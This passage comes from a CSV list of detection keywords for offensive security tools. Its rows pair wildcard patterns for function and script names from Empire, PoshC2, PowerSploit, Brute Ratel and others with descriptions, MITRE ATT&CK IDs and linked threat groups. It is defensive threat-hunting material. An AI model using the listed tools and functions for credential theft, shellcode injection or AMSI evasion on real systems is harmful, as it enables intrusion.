TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*getprivs.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*get-process *amsi.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-RBCD-Threaded*","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","1","N/A","N/A","2","115","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z" +"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-RegistryAutoLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-RegistryAutoLogon*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*GetRektBoy724/SharpUnhooker*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" +"*Get-RemoteCachedCredential*","offensive_tool_keyword","AD exploitation cheat sheet","Get cached credentials (if any)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-RemoteCachedCredential*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" +"*Get-RemoteDesktopUserSessionList*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-RemoteDesktopUserSessionList.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-RemoteLocalAccountHash*","offensive_tool_keyword","AD exploitation cheat sheet","Get local account hashes","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-RemoteLocalAccountHash*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" +"*Get-RemoteMachineAccountHash*","offensive_tool_keyword","AD exploitation cheat sheet","Get machine account hash for silver ticket attack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*getremoteprocesslisting*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-RickAstley*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-RickAstley.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-RickAstley.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*gets4uticket.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*Get-SccmCacheFolder*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*get-screenshot*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-screenshotallwindows*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-SecurityPackages.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ShadowCopies*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*GetShellcode(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*Get-SitelistFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1121","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*getsploit*","offensive_tool_keyword","getsploit","Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.","T1583 - T1584 - T1586","TA0007","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/getsploit","1","0","N/A","N/A","10","1668","255","2023-03-27T15:18:55Z","2017-06-04T09:31:44Z" +"*Get-SPN.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-spns All*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*get-spns ASREP*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*get-spns spns*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*Get-SQLInstanceDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - 